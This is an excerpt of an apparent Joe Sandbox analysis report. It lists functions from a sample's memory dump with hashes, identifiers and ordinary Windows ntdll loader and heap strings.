                                                                                  • Opcode Fuzzy Hash: 49f4c2cb630d3c68b9845b7b73fbbb227dcabac455cbdf7f4ba376300a3fd040
                                                                                  • Instruction Fuzzy Hash: 11314872604201EFDB36AF6DC885B6EB7B5FB84B04F190019E910E7245C7B09B91CB81
                                                                                  Function 018229A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • HEAP[%wZ]: , xrefs: 01823255
                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0182327D
                                                                                  • HEAP: , xrefs: 01823264
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                  • API String ID: 0-617086771
                                                                                  • Opcode ID: 9163e9d38fa49c949efcf6eb0441c933a46d5f6d1974730ffe57138371cb3fc9
                                                                                  • Instruction ID: 90d1d48947b330e8c9a30ac263944b0435f1ca073700c7214de687b5de624341
                                                                                  • Opcode Fuzzy Hash: 9163e9d38fa49c949efcf6eb0441c933a46d5f6d1974730ffe57138371cb3fc9
                                                                                  • Instruction Fuzzy Hash: D192BD71A042699FDB26CF68C454BADBBF2FF48304F148059E959EB391D738AA81CF50
                                                                                  Function 018A02C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                                  • API String ID: 0-1670051934
                                                                                  • Opcode ID: 947ef8018ae196fa542a969e4bc3714ea1900ebb844a01894699361e59384b84
                                                                                  • Instruction ID: 3ba15feda7e8de85f140e222064d2a53289599803e19c77755822bf67d62ad93
                                                                                  • Opcode Fuzzy Hash: 947ef8018ae196fa542a969e4bc3714ea1900ebb844a01894699361e59384b84
                                                                                  • Instruction Fuzzy Hash: C3227E72A047068FE764CF2DC99162ABBE1BBC4314FA4892EF2DAC7650D771E644CB41
                                                                                  Function 01820770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-4253913091
                                                                                  • Opcode ID: e9a6c4e5b1ccc82c147f8ba6a1ea5be953572be0cd3d26184e963d7912530524
                                                                                  • Instruction ID: 8b4cf04b9c0abedcaead66567e4d09024776f1ee075ae8817f60fcc32869ad52
                                                                                  • Opcode Fuzzy Hash: e9a6c4e5b1ccc82c147f8ba6a1ea5be953572be0cd3d26184e963d7912530524
                                                                                  • Instruction Fuzzy Hash: B8F17B70B0061ADFEB26CF68C894B6AB7B5FF44304F148169E516DB392D734EA81CB91
                                                                                  Function 01811460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • HEAP[%wZ]: , xrefs: 01811712
                                                                                  • HEAP: , xrefs: 01811596
                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01811728
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                  • API String ID: 0-3178619729
                                                                                  • Opcode ID: 6a5146435399e25576c2317a8e555a81cb565b39cb428ddee8784a462f08978e
                                                                                  • Instruction ID: a12c8ecff30a0b79d30affba5ab1a2cc1e828a247ce1a8623da493f7814cf025
                                                                                  • Opcode Fuzzy Hash: 6a5146435399e25576c2317a8e555a81cb565b39cb428ddee8784a462f08978e
                                                                                  • Instruction Fuzzy Hash: AEE10471A046459FDB25CF3CC495BBABBF9AF44304F18885DE696CB24AD734EA40CB50
                                                                                  Function 01836962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $@
                                                                                  • API String ID: 0-1077428164
                                                                                  • Opcode ID: 3a88563ef4400f419ef06867daca729eff9fb73036193c08f721494ddfd86a4a
                                                                                  • Instruction ID: cbcbb9c6f1b3b2114675eabe00006bb30f271454e5ded1a60f0991ec1172c9a4
                                                                                  • Opcode Fuzzy Hash: 3a88563ef4400f419ef06867daca729eff9fb73036193c08f721494ddfd86a4a
                                                                                  • Instruction Fuzzy Hash: 9AC283B16083459FD725CF29C880BABBBE5AFC8754F08892DF989C7241D734DA45CB92
                                                                                  Function 0180A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                  • API String ID: 0-2779062949
                                                                                  • Opcode ID: 7d3448af6e278a8b2ffce18c1f7c349e650a15df0ab5dd5003d8f06896c6c4ff
                                                                                  • Instruction ID: 96fe3adc393c232e5ee2d26bdb0b2b95a07636312130a4c6a7be663da726ef6d
                                                                                  • Opcode Fuzzy Hash: 7d3448af6e278a8b2ffce18c1f7c349e650a15df0ab5dd5003d8f06896c6c4ff
                                                                                  • Instruction Fuzzy Hash: FBA16B719116299BDB32DF68CC88BAAB7B8EF48710F1001E9E909E7250D7359F84CF51
                                                                                  Function 01830BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0187A121
                                                                                  • LdrpCheckModule, xrefs: 0187A117
                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 0187A10F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-161242083
                                                                                  • Opcode ID: 8c4454ffb7bf696a7998176c3ca207eba570a6afa260cd7c71f49a01ed1a510a
                                                                                  • Instruction ID: 8ce8d89aa4bbb3f480f55c8e343b8fb3f2ddc549707d11dde26d31dc0f18df91
                                                                                  • Opcode Fuzzy Hash: 8c4454ffb7bf696a7998176c3ca207eba570a6afa260cd7c71f49a01ed1a510a
                                                                                  • Instruction Fuzzy Hash: AB718D71A00205DFDB2ADF6CC985AAEB7F4EB84704F18442DE906E7255E734AF42CB91
                                                                                  Function 018BDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • HEAP[%wZ]: , xrefs: 018BDC12
                                                                                  • HEAP: , xrefs: 018BDC1F
                                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 018BDC32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                  • API String ID: 0-3815128232
                                                                                  • Opcode ID: 8da172e656aceca3b5d7ae89e4825a89530f8d8287199e6f0bea39222acc2cc1
                                                                                  • Instruction ID: 3d971e1239b0edd66134c991a9a462f9b012e99332745de14c9053715f79ca9d
                                                                                  • Opcode Fuzzy Hash: 8da172e656aceca3b5d7ae89e4825a89530f8d8287199e6f0bea39222acc2cc1
                                                                                  • Instruction Fuzzy Hash: BA512535104118AAE375CAADC8C47F27BE1EF4534CF044A4AE5C2CB385D265DA43DB21
                                                                                  Function 0184C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Failed to reallocate the system dirs string !, xrefs: 018882D7
                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 018882DE
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 018882E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1783798831
                                                                                  • Opcode ID: 2e95af32efbacb8844ab7e047c6067edf78ce00592e64f4e0a4368fe3ce22736
                                                                                  • Instruction ID: 5ec24c33b2951960d1917c908a2cac19d7dbc4bdac0240d7215c6daa7306504e
                                                                                  • Opcode Fuzzy Hash: 2e95af32efbacb8844ab7e047c6067edf78ce00592e64f4e0a4368fe3ce22736
                                                                                  • Instruction Fuzzy Hash: 444111B154A305AFD722EB6CDC44B5B7BE8AF48754F00492AF948D3295EB70DA00CB92
                                                                                  Function 018CC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • PreferredUILanguages, xrefs: 018CC212
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 018CC1C5
                                                                                  • @, xrefs: 018CC1F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                  • API String ID: 0-2968386058
                                                                                  • Opcode ID: 8a722ae560fb26624f1b90519a58751be6827d027610a6e57425ab521390a4f5
                                                                                  • Instruction ID: d689fb7f2687c0d453d2577b4ad3f8e36e358c16ed0e728b9049562e2b2369b5
                                                                                  • Opcode Fuzzy Hash: 8a722ae560fb26624f1b90519a58751be6827d027610a6e57425ab521390a4f5
                                                                                  • Instruction Fuzzy Hash: E2414171E00219EBDF11DAD8C851BEEBBBAEB14B04F14416EEA09E7280D774DB44CB91
                                                                                  Function 018A4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                  • API String ID: 0-1373925480
                                                                                  • Opcode ID: fdfbc79687b6abae87bc7b731d23c651d9d2c5a0ca85cf7b6c92e7bff9e4d81d
                                                                                  • Instruction ID: 114e1565111c3e23b93f207f834336a12184b06571277a15a2097b3ca94d0c13
                                                                                  • Opcode Fuzzy Hash: fdfbc79687b6abae87bc7b731d23c651d9d2c5a0ca85cf7b6c92e7bff9e4d81d
                                                                                  • Instruction Fuzzy Hash: 9B412B319006588BFF26DBD8C840BADBBB8FF55344F580469D901EB382D7B49B01CB51
                                                                                  Function 01894755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01894899
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01894888
                                                                                  • LdrpCheckRedirection, xrefs: 0189488F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-3154609507
                                                                                  • Opcode ID: ff129dbd982ec77b471c98b605538171333e7eee084b1dda1ce2d13fe353c697
                                                                                  • Instruction ID: 02c8cee69ea1aebdffe1132f0859cec9b0b4a689c2fb1b25158ca30d4e7b9b6b
                                                                                  • Opcode Fuzzy Hash: ff129dbd982ec77b471c98b605538171333e7eee084b1dda1ce2d13fe353c697
                                                                                  • Instruction Fuzzy Hash: 1241D432A143599FCF22CE5DDA40A2ABBE4BF89754F09055DED48EB311D731DA02CB91
                                                                                  Function 01820BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-2558761708
                                                                                  • Opcode ID: 6b24f50f4395c7ac80cc4a54852946ad78e6cc2b2f5f8e377ab6ad95e175e2e3
                                                                                  • Instruction ID: 3e4e78a92087f5300fe3ea12be9ad89e47db99c278aebc8a4f47e95cb6568ca1
                                                                                  • Opcode Fuzzy Hash: 6b24f50f4395c7ac80cc4a54852946ad78e6cc2b2f5f8e377ab6ad95e175e2e3
                                                                                  • Instruction Fuzzy Hash: DE1103B135811A9FDB2ACB18C894B36B3A4EF40B1AF18812DF406CB291DB30EA81C751
                                                                                  Function 018920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 018920F3
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01892104
                                                                                  • LdrpInitializationFailure, xrefs: 018920FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2986994758
                                                                                  • Opcode ID: 7b29a39398c83ca5f00090055f17f51587dfc793943eb7ba53ae11e80677319c
                                                                                  • Instruction ID: 0dac5eda78c27378f4288ff764a1bc50badc794f5753554b87f319ea271c199e
                                                                                  • Opcode Fuzzy Hash: 7b29a39398c83ca5f00090055f17f51587dfc793943eb7ba53ae11e80677319c
                                                                                  • Instruction Fuzzy Hash: 15F028B4680308BFEB20E60CCC12F9677ACFB40B14F14001CF700A7282D2B0AB50C681
                                                                                  Function 018203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: #%u
                                                                                  • API String ID: 48624451-232158463
                                                                                  • Opcode ID: c6daf27403a0a17cc037422c1625b79256b57c5600db5ddf6d2b5139f74cca18
                                                                                  • Instruction ID: 464347311d7f126602f6e7e4fff06459413483d28fbe10cc65378574cc0b527c
                                                                                  • Opcode Fuzzy Hash: c6daf27403a0a17cc037422c1625b79256b57c5600db5ddf6d2b5139f74cca18
                                                                                  • Instruction Fuzzy Hash: D8713A71A0015A9FDB02DFACC994BAEBBF8FF58704F144065E905E7251EA38EE41CB61
                                                                                  Function 018252A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@
                                                                                  • API String ID: 0-149943524
                                                                                  • Opcode ID: 7f2b95aa20ab1ecd77c6bf7b5e9541039c52047cb8e8628b09b11bf26ddaf2d4
                                                                                  • Instruction ID: a8e190eadaea2e76f8e21ac658ad30ef185b493e1b7d467814ffffb259f1c8ba
                                                                                  • Opcode Fuzzy Hash: 7f2b95aa20ab1ecd77c6bf7b5e9541039c52047cb8e8628b09b11bf26ddaf2d4
                                                                                  • Instruction Fuzzy Hash: 41328C705483228BE726CF18C4947BEBBE1EF89754F24491EFA85D7290E774DA80CB52
                                                                                  Function 0181A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrResSearchResource Enter, xrefs: 0181AA13
                                                                                  • LdrResSearchResource Exit, xrefs: 0181AA25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                  • API String ID: 0-4066393604
                                                                                  • Opcode ID: 4e9045dff0219e559029259c7a941529c9dda2a7134d91f3f4f316c597af846e
                                                                                  • Instruction ID: 68db1cf6dcb4438dce355b405f2dc0e739a4acede01b07570040063932b98aaa
                                                                                  • Opcode Fuzzy Hash: 4e9045dff0219e559029259c7a941529c9dda2a7134d91f3f4f316c597af846e
                                                                                  • Instruction Fuzzy Hash: 7AE18072A01299AFEF26CE9DD980BAEBBBEBF04314F140426E901E7255D774DB40CB51
                                                                                  Function 018DA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction ID: d7d2deb7227cbde51f955e1efffd59783765ba2caf6acc5db830787e9db71fd8
                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction Fuzzy Hash: 9FC1C3312043469BE729CF28C841B6BBBE6BFC4318F284A2DF696C7291D775D645CB42
                                                                                  Function 01810CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • ResIdCount less than 2., xrefs: 0186EEC9
                                                                                  • Failed to retrieve service checksum., xrefs: 0186EE56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                  • API String ID: 0-863616075
                                                                                  • Opcode ID: cdf18d0e65d77ac959086ac2e181bbef9005e81725f04fbfecff4a551dd3e5f6
                                                                                  • Instruction ID: f53d5169eea65f60044d7aa67a80bd70269c93739c869483dcbe4d8ff159b5ae
                                                                                  • Opcode Fuzzy Hash: cdf18d0e65d77ac959086ac2e181bbef9005e81725f04fbfecff4a551dd3e5f6
                                                                                  • Instruction Fuzzy Hash: 8CE1E3B19087449FD365CF19C480BABFBE4BB88314F408A2EE599CB381D7719A49CF56
                                                                                  Function 0188E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  • Opcode ID: 2b4eac70bb7712463bf6cc35bd8d0e8b3ca7e6d33687a1f2a8eacf1acc8fa27e
                                                                                  • Instruction ID: b7da3b49b298c3b1f6ee3a3afe4827e1f75f0f38440db0050ec9d89440311ef5
                                                                                  • Opcode Fuzzy Hash: 2b4eac70bb7712463bf6cc35bd8d0e8b3ca7e6d33687a1f2a8eacf1acc8fa27e
                                                                                  • Instruction Fuzzy Hash: B4615B71E143199FDB25EFA9C940BAEBBB9FB48704F14402DEA49EB251D731AE40CB50
                                                                                  Function 018B43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  • Opcode ID: b964c6de8d65a4db3c2c50a03e5a5eb496a1560ef8cc641d9a4660cd4ceb6202
                                                                                  • Instruction ID: dd52be0cbc627da04cd7ecfb0711d9073ef258a457af76b4e0c2e2640cd12b9c
                                                                                  • Opcode Fuzzy Hash: b964c6de8d65a4db3c2c50a03e5a5eb496a1560ef8cc641d9a4660cd4ceb6202
                                                                                  • Instruction Fuzzy Hash: 13512771E0061DAEDF11DFE9CC81AEEBBB9EB48754F100529EA11F7281D6349A05CB60
                                                                                  Function 018104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • kLsE, xrefs: 01810540
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0181063D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 0-2547482624
                                                                                  • Opcode ID: 19294a34c2753fe5385bf20486829fe8fae2a2666113b23445078951eabf6fee
                                                                                  • Instruction ID: 3f0da4261a188abd77e65cf4393e6b40389f0d59f7dd41fc97b1900d3a081684
                                                                                  • Opcode Fuzzy Hash: 19294a34c2753fe5385bf20486829fe8fae2a2666113b23445078951eabf6fee
                                                                                  • Instruction Fuzzy Hash: 8D51AD725047468FD725EF68C9406A7BBE8AF84304F104C3EFA9AC7245E770DA85CB92
                                                                                  Function 0181A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0181A309
                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0181A2FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                  • API String ID: 0-2876891731
                                                                                  • Opcode ID: 9344a05f5e5eab7d0ccbf9a00c548729f484d8ab5ba175aa32cfacb49da5c760
                                                                                  • Instruction ID: a8a8b748602424cfe012955fd4005dc73aad8dda08e8d3de027306dd7f52c1bd
                                                                                  • Opcode Fuzzy Hash: 9344a05f5e5eab7d0ccbf9a00c548729f484d8ab5ba175aa32cfacb49da5c760
                                                                                  • Instruction Fuzzy Hash: F341FF72A05289CBDB1ACF6DC840B6EBBB9FF84704F1440A5E904DB2A5E3B5CB40CB51
                                                                                  Function 0184A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                  • API String ID: 2994545307-4008356553
                                                                                  • Opcode ID: d5a153db081f75b1ae875d618726963c19711e14019c86a8558f6ec1b1758ec2
                                                                                  • Instruction ID: 0f5e1da4281c8192bf1baceefa49306767d3023e3f140c2d40c718ae5b6ca789
                                                                                  • Opcode Fuzzy Hash: d5a153db081f75b1ae875d618726963c19711e14019c86a8558f6ec1b1758ec2
                                                                                  • Instruction Fuzzy Hash: 980128B2284708EFD311DF14CD49F1677E8EB84B19F018939B649CB190EB74D904CB4A
                                                                                  Function 0181C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: MUI
                                                                                  • API String ID: 0-1339004836
                                                                                  • Opcode ID: 8697516108575d19bf74c838951bcc228df03b125d414466b1ba866d18a3c3be
                                                                                  • Instruction ID: 49461662f83d26ece4111b825a55efc999ea8492d147d3dc9411b69431585b55
                                                                                  • Opcode Fuzzy Hash: 8697516108575d19bf74c838951bcc228df03b125d414466b1ba866d18a3c3be
